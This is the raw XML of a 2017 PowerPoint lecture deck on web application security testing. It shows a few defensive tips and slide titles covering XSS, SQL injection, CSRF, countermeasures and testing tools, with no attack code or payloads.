            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>tester, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>focus testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>side of the system—emulating what the client does and evaluating the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>server’s response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Keep server and third-party applications and library up-to-date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Do not trust user input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Review code &amp; design and identify possible weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Monitor run-time activity to detect ongoing attacks/probes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4441</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>458</Paragraphs>
  <Slides>91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Office Theme</vt:lpstr>
      <vt:lpstr>Web Application  Security Testing</vt:lpstr>
      <vt:lpstr>Web Application Security Testing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HTTP</vt:lpstr>
      <vt:lpstr>HTTP</vt:lpstr>
      <vt:lpstr>HTTP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 Structures</vt:lpstr>
      <vt:lpstr>Web Application Structures</vt:lpstr>
      <vt:lpstr>Web Application</vt:lpstr>
      <vt:lpstr>Web Application</vt:lpstr>
      <vt:lpstr>Web Application</vt:lpstr>
      <vt:lpstr>Web Application</vt:lpstr>
      <vt:lpstr>One-layer Web Application</vt:lpstr>
      <vt:lpstr>One-layer Web Application</vt:lpstr>
      <vt:lpstr>Two-layer Web Application</vt:lpstr>
      <vt:lpstr>Two-layer Web Application</vt:lpstr>
      <vt:lpstr>Two-layer Web Application</vt:lpstr>
      <vt:lpstr>Three-layer Web Application</vt:lpstr>
      <vt:lpstr>Three-layer Web Application</vt:lpstr>
      <vt:lpstr>Web Application- Data Encoding</vt:lpstr>
      <vt:lpstr>Web Application – Data Encoding</vt:lpstr>
      <vt:lpstr>Web Application- Data Encoding</vt:lpstr>
      <vt:lpstr>Web Application- Data Encoding</vt:lpstr>
      <vt:lpstr>Web Application Security</vt:lpstr>
      <vt:lpstr>Vulnerabilities</vt:lpstr>
      <vt:lpstr>Misconfiguration</vt:lpstr>
      <vt:lpstr>Client-side controls</vt:lpstr>
      <vt:lpstr>Client-side controls</vt:lpstr>
      <vt:lpstr>Client-side controls</vt:lpstr>
      <vt:lpstr>Client-side controls</vt:lpstr>
      <vt:lpstr>Client-side controls</vt:lpstr>
      <vt:lpstr>Client-side controls</vt:lpstr>
      <vt:lpstr>Direct object reference</vt:lpstr>
      <vt:lpstr>Authentication errors</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Three types of XSS</vt:lpstr>
      <vt:lpstr>XSS attacks: stealing cookie</vt:lpstr>
      <vt:lpstr>XSS attacks: “defacement”</vt:lpstr>
      <vt:lpstr>XSS attacks: phishing</vt:lpstr>
      <vt:lpstr>XSS attacks: privacy violation</vt:lpstr>
      <vt:lpstr>XSS attacks: run exploits</vt:lpstr>
      <vt:lpstr>XSS attacks: JavaScript malware</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>SQLI attacks</vt:lpstr>
      <vt:lpstr>SQLI attacks: DB structure</vt:lpstr>
      <vt:lpstr>Cross-site request forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-site request forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-site request forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-site request forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Defenses</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Countermeasure: refinement</vt:lpstr>
      <vt:lpstr>Solution 1</vt:lpstr>
      <vt:lpstr>Solution 2</vt:lpstr>
      <vt:lpstr>Solution 2</vt:lpstr>
      <vt:lpstr>Countermeasures: SQLI</vt:lpstr>
      <vt:lpstr>CSRF countermeasures</vt:lpstr>
      <vt:lpstr>CSRF countermeasures</vt:lpstr>
      <vt:lpstr>CSRF countermeasures</vt:lpstr>
      <vt:lpstr>CSRF countermeasures</vt:lpstr>
      <vt:lpstr>CSRF countermeasures</vt:lpstr>
      <vt:lpstr>CSRF countermeasures</vt:lpstr>
      <vt:lpstr>CSRF countermeasures</vt:lpstr>
      <vt:lpstr>CSRF countermeasures</vt:lpstr>
      <vt:lpstr>TOOLs</vt:lpstr>
      <vt:lpstr>Tools: source code analysis</vt:lpstr>
      <vt:lpstr>Tools: request tampering</vt:lpstr>
      <vt:lpstr>Tools: burp</vt:lpstr>
      <vt:lpstr>Tools: web application scanners</vt:lpstr>
      <vt:lpstr>Tools: mod_security</vt:lpstr>
      <vt:lpstr>Tools: PHPIDS</vt:lpstr>
      <vt:lpstr>Tools: log analyzers</vt:lpstr>
      <vt:lpstr>Conclusions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 Security Testing</dc:title>
  <dc:creator>Dipti Rana</dc:creator>
  <cp:lastModifiedBy>Dipti Rana</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-04-05T11:04:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-04-20T17:09:31Z</dcterms:modified>
</cp:coreProperties>
</file>